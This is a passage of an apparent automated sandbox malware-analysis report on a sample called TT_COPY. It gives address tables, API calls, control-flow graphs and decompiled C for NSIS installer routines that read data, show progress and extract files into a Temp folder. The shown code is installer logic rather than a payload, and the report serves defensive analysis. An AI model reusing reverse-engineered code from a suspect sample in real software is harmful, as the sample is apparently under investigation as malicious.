                                                                                                                            0x004066ed
                                                                                                                            0x004066f6
                                                                                                                            0x004066f9
                                                                                                                            0x004066ff
                                                                                                                            0x00406703
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00406703
                                                                                                                            0x004066cb
                                                                                                                            0x004066cd
                                                                                                                            0x004066cf
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004066cf
                                                                                                                            0x00000000
                                                                                                                            0x00406709
                                                                                                                            0x00406695
                                                                                                                            0x00000000
                                                                                                                            0x0040664f
                                                                                                                            0x0040666d
                                                                                                                            0x00406676
                                                                                                                            0x00406713
                                                                                                                            0x00406717
                                                                                                                            0x0040671f
                                                                                                                            0x0040671f
                                                                                                                            0x00000000
                                                                                                                            0x00406717
                                                                                                                            0x00406680
                                                                                                                            0x0040670d
                                                                                                                            0x00406711
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00406711
                                                                                                                            0x0040664d
                                                                                                                            0x00000000
                                                                                                                            0x004065da

                                                                                                                            APIs
                                                                                                                            • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00406695
                                                                                                                            • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,0042C248,?,004055D6,0042C248,00000000,00000000,00424A84,75DF23A0), ref: 004066A8
                                                                                                                            • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                                                                                                            • lstrlenW.KERNEL32(Call,00000000,0042C248,?,004055D6,0042C248,00000000), ref: 00406779
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1069590569.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1069539735.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069665567.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069705541.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069757377.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069866925.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069912074.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069940321.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069964680.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069994200.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1070016354.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_TT_COPY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Directory$SystemWindowslstrcatlstrlen
                                                                                                                            • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                            • API String ID: 4260037668-1230650788
                                                                                                                            • Opcode ID: c06be4e573324e40d3b735838f303e9f3324c9f348604da111048893f4ce4833
                                                                                                                            • Instruction ID: 685928b229c5d1fd60d609eb920d771e11fa4d776b5b66b0bad6c944a0f90ddf
                                                                                                                            • Opcode Fuzzy Hash: c06be4e573324e40d3b735838f303e9f3324c9f348604da111048893f4ce4833
                                                                                                                            • Instruction Fuzzy Hash: 1D61D131900205EADB209F64DD80BAE77A5EF54318F22813BE907B72D0D77D99A1CB5D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 734 4032b4-4032cb 735 4032d4-4032dd 734->735 736 4032cd 734->736 737 4032e6-4032eb 735->737 738 4032df 735->738 736->735 739 4032fb-403308 call 4034cf 737->739 740 4032ed-4032f6 call 4034e5 737->740 738->737 744 4034bd 739->744 745 40330e-403312 739->745 740->739 746 4034bf-4034c0 744->746 747 403468-40346a 745->747 748 403318-403361 GetTickCount 745->748 751 4034c8-4034cc 746->751 749 4034aa-4034ad 747->749 750 40346c-40346f 747->750 752 4034c5 748->752 753 403367-40336f 748->753 756 4034b2-4034bb call 4034cf 749->756 757 4034af 749->757 750->752 758 403471 750->758 752->751 754 403371 753->754 755 403374-403382 call 4034cf 753->755 754->755 755->744 767 403388-403391 755->767 756->744 768 4034c2 756->768 757->756 761 403474-40347a 758->761 764 40347c 761->764 765 40347e-40348c call 4034cf 761->765 764->765 765->744 771 40348e-403493 call 4060df 765->771 770 403397-4033b7 call 406a65 767->770 768->752 776 403460-403462 770->776 777 4033bd-4033d0 GetTickCount 770->777 775 403498-40349a 771->775 778 403464-403466 775->778 779 40349c-4034a6 775->779 776->746 780 4033d2-4033da 777->780 781 40341b-40341d 777->781 778->746 779->761 782 4034a8 779->782 783 4033e2-403418 MulDiv wsprintfW call 40559f 780->783 784 4033dc-4033e0 780->784 785 403454-403458 781->785 786 40341f-403423 781->786 782->752 783->781 784->781 784->783 785->753 789 40345e 785->789 787 403425-40342c call 4060df 786->787 788 40343a-403445 786->788 794 403431-403433 787->794 792 403448-40344c 788->792 789->752 792->770 795 403452 792->795 794->778 796 403435-403438 794->796 795->752 796->792
                                                                                                                            C-Code - Quality: 95%
                                                                                                                            			E004032B4(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
                                                                                                                            				signed int _v8;
                                                                                                                            				int _v12;
                                                                                                                            				intOrPtr _v16;
                                                                                                                            				long _v20;
                                                                                                                            				intOrPtr _v24;
                                                                                                                            				short _v152;
                                                                                                                            				void* _t65;
                                                                                                                            				void* _t69;
                                                                                                                            				long _t70;
                                                                                                                            				intOrPtr _t75;
                                                                                                                            				long _t76;
                                                                                                                            				intOrPtr _t77;
                                                                                                                            				void* _t78;
                                                                                                                            				int _t88;
                                                                                                                            				intOrPtr _t92;
                                                                                                                            				intOrPtr _t95;
                                                                                                                            				long _t96;
                                                                                                                            				signed int _t97;
                                                                                                                            				int _t98;
                                                                                                                            				int _t99;
                                                                                                                            				intOrPtr _t100;
                                                                                                                            				void* _t101;
                                                                                                                            				void* _t102;
                                                                                                                            
                                                                                                                            				_t97 = _a16;
                                                                                                                            				_t92 = _a12;
                                                                                                                            				_v12 = _t97;
                                                                                                                            				if(_t92 == 0) {
                                                                                                                            					_v12 = 0x8000;
                                                                                                                            				}
                                                                                                                            				_v8 = _v8 & 0x00000000;
                                                                                                                            				_v16 = _t92;
                                                                                                                            				if(_t92 == 0) {
                                                                                                                            					_v16 = 0x422a20;
                                                                                                                            				}
                                                                                                                            				_t62 = _a4;
                                                                                                                            				if(_a4 >= 0) {
                                                                                                                            					E004034E5( *0x434f58 + _t62);
                                                                                                                            				}
                                                                                                                            				if(E004034CF( &_a16, 4) == 0) {
                                                                                                                            					L41:
                                                                                                                            					_push(0xfffffffd);
                                                                                                                            					goto L42;
                                                                                                                            				} else {
                                                                                                                            					if((_a19 & 0x00000080) == 0) {
                                                                                                                            						if(_t92 != 0) {
                                                                                                                            							if(_a16 < _t97) {
                                                                                                                            								_t97 = _a16;
                                                                                                                            							}
                                                                                                                            							if(E004034CF(_t92, _t97) != 0) {
                                                                                                                            								_v8 = _t97;
                                                                                                                            								L44:
                                                                                                                            								return _v8;
                                                                                                                            							} else {
                                                                                                                            								goto L41;
                                                                                                                            							}
                                                                                                                            						}
                                                                                                                            						if(_a16 <= _t92) {
                                                                                                                            							goto L44;
                                                                                                                            						}
                                                                                                                            						_t88 = _v12;
                                                                                                                            						while(1) {
                                                                                                                            							_t98 = _a16;
                                                                                                                            							if(_a16 >= _t88) {
                                                                                                                            								_t98 = _t88;
                                                                                                                            							}
                                                                                                                            							if(E004034CF(0x41ea20, _t98) == 0) {
                                                                                                                            								goto L41;
                                                                                                                            							}
                                                                                                                            							_t69 = E004060DF(_a8, 0x41ea20, _t98); // executed
                                                                                                                            							if(_t69 == 0) {
                                                                                                                            								L28:
                                                                                                                            								_push(0xfffffffe);
                                                                                                                            								L42:
                                                                                                                            								_pop(_t65);
                                                                                                                            								return _t65;
                                                                                                                            							}
                                                                                                                            							_v8 = _v8 + _t98;
                                                                                                                            							_a16 = _a16 - _t98;
                                                                                                                            							if(_a16 > 0) {
                                                                                                                            								continue;
                                                                                                                            							}
                                                                                                                            							goto L44;
                                                                                                                            						}
                                                                                                                            						goto L41;
                                                                                                                            					}
                                                                                                                            					_t70 = GetTickCount();
                                                                                                                            					 *0x40d384 =  *0x40d384 & 0x00000000;
                                                                                                                            					 *0x40d380 =  *0x40d380 & 0x00000000;
                                                                                                                            					_t14 =  &_a16;
                                                                                                                            					 *_t14 = _a16 & 0x7fffffff;
                                                                                                                            					_v20 = _t70;
                                                                                                                            					 *0x40ce68 = 8;
                                                                                                                            					 *0x416a10 = 0x40ea08;
                                                                                                                            					 *0x416a0c = 0x40ea08;
                                                                                                                            					 *0x416a08 = 0x416a08;
                                                                                                                            					_a4 = _a16;
                                                                                                                            					if( *_t14 <= 0) {
                                                                                                                            						goto L44;
                                                                                                                            					} else {
                                                                                                                            						goto L9;
                                                                                                                            					}
                                                                                                                            					while(1) {
                                                                                                                            						L9:
                                                                                                                            						_t99 = 0x4000;
                                                                                                                            						if(_a16 < 0x4000) {
                                                                                                                            							_t99 = _a16;
                                                                                                                            						}
                                                                                                                            						if(E004034CF(0x41ea20, _t99) == 0) {
                                                                                                                            							goto L41;
                                                                                                                            						}
                                                                                                                            						_a16 = _a16 - _t99;
                                                                                                                            						 *0x40ce58 = 0x41ea20;
                                                                                                                            						 *0x40ce5c = _t99;
                                                                                                                            						while(1) {
                                                                                                                            							_t95 = _v16;
                                                                                                                            							 *0x40ce60 = _t95;
                                                                                                                            							 *0x40ce64 = _v12;
                                                                                                                            							_t75 = E00406A65(0x40ce58);
                                                                                                                            							_v24 = _t75;
                                                                                                                            							if(_t75 < 0) {
                                                                                                                            								break;
                                                                                                                            							}
                                                                                                                            							_t100 =  *0x40ce60; // 0x424a84
                                                                                                                            							_t101 = _t100 - _t95;
                                                                                                                            							_t76 = GetTickCount();
                                                                                                                            							_t96 = _t76;
                                                                                                                            							if(( *0x434fb4 & 0x00000001) != 0 && (_t76 - _v20 > 0xc8 || _a16 == 0)) {
                                                                                                                            								wsprintfW( &_v152, L"... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
                                                                                                                            								_t102 = _t102 + 0xc;
                                                                                                                            								E0040559F(0,  &_v152);
                                                                                                                            								_v20 = _t96;
                                                                                                                            							}
                                                                                                                            							if(_t101 == 0) {
                                                                                                                            								if(_a16 > 0) {
                                                                                                                            									goto L9;
                                                                                                                            								}
                                                                                                                            								goto L44;
                                                                                                                            							} else {
                                                                                                                            								if(_a12 != 0) {
                                                                                                                            									_t77 =  *0x40ce60; // 0x424a84
                                                                                                                            									_v8 = _v8 + _t101;
                                                                                                                            									_v12 = _v12 - _t101;
                                                                                                                            									_v16 = _t77;
                                                                                                                            									L23:
                                                                                                                            									if(_v24 != 1) {
                                                                                                                            										continue;
                                                                                                                            									}
                                                                                                                            									goto L44;
                                                                                                                            								}
                                                                                                                            								_t78 = E004060DF(_a8, _v16, _t101); // executed
                                                                                                                            								if(_t78 == 0) {
                                                                                                                            									goto L28;
                                                                                                                            								}
                                                                                                                            								_v8 = _v8 + _t101;
                                                                                                                            								goto L23;
                                                                                                                            							}
                                                                                                                            						}
                                                                                                                            						_push(0xfffffffc);
                                                                                                                            						goto L42;
                                                                                                                            					}
                                                                                                                            					goto L41;
                                                                                                                            				}
                                                                                                                            			}


























                                                                                                                            0x004032bf
                                                                                                                            0x004032c3
                                                                                                                            0x004032c6
                                                                                                                            0x004032cb
                                                                                                                            0x004032cd
                                                                                                                            0x004032cd
                                                                                                                            0x004032d4
                                                                                                                            0x004032d8
                                                                                                                            0x004032dd
                                                                                                                            0x004032df
                                                                                                                            0x004032df
                                                                                                                            0x004032e6
                                                                                                                            0x004032eb
                                                                                                                            0x004032f6
                                                                                                                            0x004032f6
                                                                                                                            0x00403308
                                                                                                                            0x004034bd
                                                                                                                            0x004034bd
                                                                                                                            0x00000000
                                                                                                                            0x0040330e
                                                                                                                            0x00403312
                                                                                                                            0x0040346a
                                                                                                                            0x004034ad
                                                                                                                            0x004034af
                                                                                                                            0x004034af
                                                                                                                            0x004034bb
                                                                                                                            0x004034c2
                                                                                                                            0x004034c5
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004034bb
                                                                                                                            0x0040346f
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00403471
                                                                                                                            0x00403474
                                                                                                                            0x00403477
                                                                                                                            0x0040347a
                                                                                                                            0x0040347c
                                                                                                                            0x0040347c
                                                                                                                            0x0040348c
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00403493
                                                                                                                            0x0040349a
                                                                                                                            0x00403464
                                                                                                                            0x00403464
                                                                                                                            0x004034bf
                                                                                                                            0x004034bf
                                                                                                                            0x00000000
                                                                                                                            0x004034bf
                                                                                                                            0x0040349c
                                                                                                                            0x0040349f
                                                                                                                            0x004034a6
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004034a8
                                                                                                                            0x00000000
                                                                                                                            0x00403474
                                                                                                                            0x0040331e
                                                                                                                            0x00403320
                                                                                                                            0x00403327
                                                                                                                            0x0040332e
                                                                                                                            0x0040332e
                                                                                                                            0x00403335
                                                                                                                            0x0040333d
                                                                                                                            0x00403347
                                                                                                                            0x0040334c
                                                                                                                            0x00403354
                                                                                                                            0x0040335e
                                                                                                                            0x00403361
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00403367
                                                                                                                            0x00403367
                                                                                                                            0x00403367
                                                                                                                            0x0040336f
                                                                                                                            0x00403371
                                                                                                                            0x00403371
                                                                                                                            0x00403382
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00403388
                                                                                                                            0x0040338b
                                                                                                                            0x00403391
                                                                                                                            0x00403397
                                                                                                                            0x00403397
                                                                                                                            0x004033a2
                                                                                                                            0x004033a8
                                                                                                                            0x004033ad
                                                                                                                            0x004033b4
                                                                                                                            0x004033b7
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004033bd
                                                                                                                            0x004033c3
                                                                                                                            0x004033c5
                                                                                                                            0x004033ce
                                                                                                                            0x004033d0
                                                                                                                            0x00403401
                                                                                                                            0x00403407
                                                                                                                            0x00403413
                                                                                                                            0x00403418
                                                                                                                            0x00403418
                                                                                                                            0x0040341d
                                                                                                                            0x00403458
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040341f
                                                                                                                            0x00403423
                                                                                                                            0x0040343a
                                                                                                                            0x0040343f
                                                                                                                            0x00403442
                                                                                                                            0x00403445
                                                                                                                            0x00403448
                                                                                                                            0x0040344c
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00403452
                                                                                                                            0x0040342c
                                                                                                                            0x00403433
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00403435
                                                                                                                            0x00000000
                                                                                                                            0x00403435
                                                                                                                            0x0040341d
                                                                                                                            0x00403460
                                                                                                                            0x00000000
                                                                                                                            0x00403460
                                                                                                                            0x00000000
                                                                                                                            0x00403367

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1069590569.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1069539735.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069665567.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069705541.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069757377.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069866925.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069912074.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069940321.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069964680.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069994200.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1070016354.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_TT_COPY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CountTick$wsprintf
                                                                                                                            • String ID: *B$ A$ A$... %d%%$}8@
                                                                                                                            • API String ID: 551687249-3029848762
                                                                                                                            • Opcode ID: d1cfd4714e4687a3a26bd4ac3846c46955ae89f51795138bd42b88bfc39313c7
                                                                                                                            • Instruction ID: 54ab186c05730647c672001b6e56d135182c7b51176e178f40f708a1e84a381e
                                                                                                                            • Opcode Fuzzy Hash: d1cfd4714e4687a3a26bd4ac3846c46955ae89f51795138bd42b88bfc39313c7
                                                                                                                            • Instruction Fuzzy Hash: E251BD31810219EBCF11DF65DA44B9E7BB8AF05756F10827BE804BB2C1D7789E44CBA9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 797 40176f-401794 call 402da6 call 405e83 802 401796-40179c call 40653d 797->802 803 40179e-4017b0 call 40653d call 405e0c lstrcatW 797->803 809 4017b5-4017b6 call 4067c4 802->809 803->809 812 4017bb-4017bf 809->812 813 4017c1-4017cb call 406873 812->813 814 4017f2-4017f5 812->814 822 4017dd-4017ef 813->822 823 4017cd-4017db CompareFileTime 813->823 816 4017f7-4017f8 call 406008 814->816 817 4017fd-401819 call 40602d 814->817 816->817 824 40181b-40181e 817->824 825 40188d-4018b6 call 40559f call 4032b4 817->825 822->814 823->822 826 401820-40185e call 40653d * 2 call 40657a call 40653d call 405b9d 824->826 827 40186f-401879 call 40559f 824->827 839 4018b8-4018bc 825->839 840 4018be-4018ca SetFileTime 825->840 826->812 861 401864-401865 826->861 837 401882-401888 827->837 841 402c33 837->841 839->840 843 4018d0-4018db CloseHandle 839->843 840->843 847 402c35-402c39 841->847 845 4018e1-4018e4 843->845 846 402c2a-402c2d 843->846 849 4018e6-4018f7 call 40657a lstrcatW 845->849 850 4018f9-4018fc call 40657a 845->850 846->841 855 401901-402398 849->855 850->855 859 40239d-4023a2 855->859 860 402398 call 405b9d 855->860 859->847 860->859 861->837 862 401867-401868 861->862 862->827
                                                                                                                            C-Code - Quality: 75%
                                                                                                                            			E0040176F(FILETIME* __ebx, void* __eflags) {
                                                                                                                            				void* __esi;
                                                                                                                            				void* _t35;
                                                                                                                            				void* _t43;
                                                                                                                            				void* _t45;
                                                                                                                            				FILETIME* _t51;
                                                                                                                            				FILETIME* _t64;
                                                                                                                            				void* _t66;
                                                                                                                            				signed int _t72;
                                                                                                                            				FILETIME* _t73;
                                                                                                                            				FILETIME* _t77;
                                                                                                                            				signed int _t79;
                                                                                                                            				WCHAR* _t81;
                                                                                                                            				void* _t83;
                                                                                                                            				void* _t84;
                                                                                                                            				void* _t86;
                                                                                                                            
                                                                                                                            				_t77 = __ebx;
                                                                                                                            				 *(_t86 - 8) = E00402DA6(0x31);
                                                                                                                            				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
                                                                                                                            				_t35 = E00405E83( *(_t86 - 8));
                                                                                                                            				_push( *(_t86 - 8));
                                                                                                                            				_t81 = L"Call";
                                                                                                                            				if(_t35 == 0) {
                                                                                                                            					lstrcatW(E00405E0C(E0040653D(_t81, 0x441000)), ??);
                                                                                                                            				} else {
                                                                                                                            					E0040653D();
                                                                                                                            				}
                                                                                                                            				E004067C4(_t81);
                                                                                                                            				while(1) {
                                                                                                                            					__eflags =  *(_t86 + 8) - 3;
                                                                                                                            					if( *(_t86 + 8) >= 3) {
                                                                                                                            						_t66 = E00406873(_t81);
                                                                                                                            						_t79 = 0;
                                                                                                                            						__eflags = _t66 - _t77;
                                                                                                                            						if(_t66 != _t77) {
                                                                                                                            							_t73 = _t66 + 0x14;
                                                                                                                            							__eflags = _t73;
                                                                                                                            							_t79 = CompareFileTime(_t73, _t86 - 0x24);
                                                                                                                            						}
                                                                                                                            						asm("sbb eax, eax");
                                                                                                                            						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
                                                                                                                            						__eflags = _t72;
                                                                                                                            						 *(_t86 + 8) = _t72;
                                                                                                                            					}
                                                                                                                            					__eflags =  *(_t86 + 8) - _t77;
                                                                                                                            					if( *(_t86 + 8) == _t77) {
                                                                                                                            						E00406008(_t81);
                                                                                                                            					}
                                                                                                                            					__eflags =  *(_t86 + 8) - 1;
                                                                                                                            					_t43 = E0040602D(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
                                                                                                                            					__eflags = _t43 - 0xffffffff;
                                                                                                                            					 *(_t86 - 0x38) = _t43;
                                                                                                                            					if(_t43 != 0xffffffff) {
                                                                                                                            						break;
                                                                                                                            					}
                                                                                                                            					__eflags =  *(_t86 + 8) - _t77;
                                                                                                                            					if( *(_t86 + 8) != _t77) {
                                                                                                                            						E0040559F(0xffffffe2,  *(_t86 - 8));
                                                                                                                            						__eflags =  *(_t86 + 8) - 2;
                                                                                                                            						if(__eflags == 0) {
                                                                                                                            							 *((intOrPtr*)(_t86 - 4)) = 1;
                                                                                                                            						}
                                                                                                                            						L31:
                                                                                                                            						 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t86 - 4));
                                                                                                                            						__eflags =  *0x434f88;
                                                                                                                            						goto L32;
                                                                                                                            					} else {
                                                                                                                            						E0040653D("C:\Users\Arthur\AppData\Local\Temp\nshF836.tmp", _t83);
                                                                                                                            						E0040653D(_t83, _t81);
                                                                                                                            						E0040657A(_t77, _t81, _t83, "C:\Users\Arthur\AppData\Local\Temp\nshF836.tmp\System.dll",  *((intOrPtr*)(_t86 - 0x1c)));
                                                                                                                            						E0040653D(_t83, "C:\Users\Arthur\AppData\Local\Temp\nshF836.tmp");
                                                                                                                            						_t64 = E00405B9D("C:\Users\Arthur\AppData\Local\Temp\nshF836.tmp\System.dll",  *(_t86 - 0x30) >> 3) - 4;
                                                                                                                            						__eflags = _t64;
                                                                                                                            						if(_t64 == 0) {
                                                                                                                            							continue;
                                                                                                                            						} else {
                                                                                                                            							__eflags = _t64 == 1;
                                                                                                                            							if(_t64 == 1) {
                                                                                                                            								 *0x434f88 =  &( *0x434f88->dwLowDateTime);
                                                                                                                            								L32:
                                                                                                                            								_t51 = 0;
                                                                                                                            								__eflags = 0;
                                                                                                                            							} else {
                                                                                                                            								_push(_t81);
                                                                                                                            								_push(0xfffffffa);
                                                                                                                            								E0040559F();
                                                                                                                            								L29:
                                                                                                                            								_t51 = 0x7fffffff;
                                                                                                                            							}
                                                                                                                            						}
                                                                                                                            					}
                                                                                                                            					L33:
                                                                                                                            					return _t51;
                                                                                                                            				}
                                                                                                                            				E0040559F(0xffffffea,  *(_t86 - 8));
                                                                                                                            				 *0x434fb4 =  *0x434fb4 + 1;
                                                                                                                            				_t45 = E004032B4( *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
                                                                                                                            				 *0x434fb4 =  *0x434fb4 - 1;
                                                                                                                            				__eflags =  *(_t86 - 0x24) - 0xffffffff;
                                                                                                                            				_t84 = _t45;
                                                                                                                            				if( *(_t86 - 0x24) != 0xffffffff) {
                                                                                                                            					L22:
                                                                                                                            					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
                                                                                                                            				} else {
                                                                                                                            					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
                                                                                                                            					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
                                                                                                                            						goto L22;
                                                                                                                            					}
                                                                                                                            				}
                                                                                                                            				CloseHandle( *(_t86 - 0x38)); // executed
                                                                                                                            				__eflags = _t84 - _t77;
                                                                                                                            				if(_t84 >= _t77) {
                                                                                                                            					goto L31;
                                                                                                                            				} else {
                                                                                                                            					__eflags = _t84 - 0xfffffffe;
                                                                                                                            					if(_t84 != 0xfffffffe) {
                                                                                                                            						E0040657A(_t77, _t81, _t84, _t81, 0xffffffee);
                                                                                                                            					} else {
                                                                                                                            						E0040657A(_t77, _t81, _t84, _t81, 0xffffffe9);
                                                                                                                            						lstrcatW(_t81,  *(_t86 - 8));
                                                                                                                            					}
                                                                                                                            					_push(0x200010);
                                                                                                                            					_push(_t81);
                                                                                                                            					E00405B9D();
                                                                                                                            					goto L29;
                                                                                                                            				}
                                                                                                                            				goto L33;
                                                                                                                            			}


















                                                                                                                            0x0040176f
                                                                                                                            0x00401776
                                                                                                                            0x00401782
                                                                                                                            0x00401785
                                                                                                                            0x0040178a
                                                                                                                            0x0040178d
                                                                                                                            0x00401794
                                                                                                                            0x004017b0
                                                                                                                            0x00401796
                                                                                                                            0x00401797
                                                                                                                            0x00401797
                                                                                                                            0x004017b6
                                                                                                                            0x004017bb
                                                                                                                            0x004017bb
                                                                                                                            0x004017bf
                                                                                                                            0x004017c2
                                                                                                                            0x004017c7
                                                                                                                            0x004017c9
                                                                                                                            0x004017cb
                                                                                                                            0x004017d0
                                                                                                                            0x004017d0
                                                                                                                            0x004017db
                                                                                                                            0x004017db
                                                                                                                            0x004017ec
                                                                                                                            0x004017ee
                                                                                                                            0x004017ee
                                                                                                                            0x004017ef
                                                                                                                            0x004017ef
                                                                                                                            0x004017f2
                                                                                                                            0x004017f5
                                                                                                                            0x004017f8
                                                                                                                            0x004017f8
                                                                                                                            0x004017ff
                                                                                                                            0x0040180e
                                                                                                                            0x00401813
                                                                                                                            0x00401816
                                                                                                                            0x00401819
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040181b
                                                                                                                            0x0040181e
                                                                                                                            0x00401874
                                                                                                                            0x00401879
                                                                                                                            0x004015b6
                                                                                                                            0x0040292e
                                                                                                                            0x0040292e
                                                                                                                            0x00402c2a
                                                                                                                            0x00402c2d
                                                                                                                            0x00402c2d
                                                                                                                            0x00000000
                                                                                                                            0x00401820
                                                                                                                            0x00401826
                                                                                                                            0x0040182d
                                                                                                                            0x0040183a
                                                                                                                            0x00401845
                                                                                                                            0x0040185b
                                                                                                                            0x0040185b
                                                                                                                            0x0040185e
                                                                                                                            0x00000000
                                                                                                                            0x00401864
                                                                                                                            0x00401864
                                                                                                                            0x00401865
                                                                                                                            0x00401882
                                                                                                                            0x00402c33
                                                                                                                            0x00402c33
                                                                                                                            0x00402c33
                                                                                                                            0x00401867
                                                                                                                            0x00401867
                                                                                                                            0x00401868
                                                                                                                            0x00401493
                                                                                                                            0x0040239d
                                                                                                                            0x0040239d
                                                                                                                            0x0040239d
                                                                                                                            0x00401865
                                                                                                                            0x0040185e
                                                                                                                            0x00402c35
                                                                                                                            0x00402c39
                                                                                                                            0x00402c39
                                                                                                                            0x00401892
                                                                                                                            0x00401897
                                                                                                                            0x004018a5
                                                                                                                            0x004018aa
                                                                                                                            0x004018b0
                                                                                                                            0x004018b4
                                                                                                                            0x004018b6
                                                                                                                            0x004018be
                                                                                                                            0x004018ca
                                                                                                                            0x004018b8
                                                                                                                            0x004018b8
                                                                                                                            0x004018bc
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004018bc
                                                                                                                            0x004018d3
                                                                                                                            0x004018d9
                                                                                                                            0x004018db
                                                                                                                            0x00000000
                                                                                                                            0x004018e1
                                                                                                                            0x004018e1
                                                                                                                            0x004018e4
                                                                                                                            0x004018fc
                                                                                                                            0x004018e6
                                                                                                                            0x004018e9
                                                                                                                            0x004018f2
                                                                                                                            0x004018f2
                                                                                                                            0x00401901
                                                                                                                            0x00401906
                                                                                                                            0x00402398
                                                                                                                            0x00000000
                                                                                                                            0x00402398
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                                                                                            • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,00441000,?,?,00000031), ref: 004017D5
                                                                                                                              • Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A
                                                                                                                              • Part of subcall function 0040559F: lstrlenW.KERNEL32(0042C248,00000000,00424A84,75DF23A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
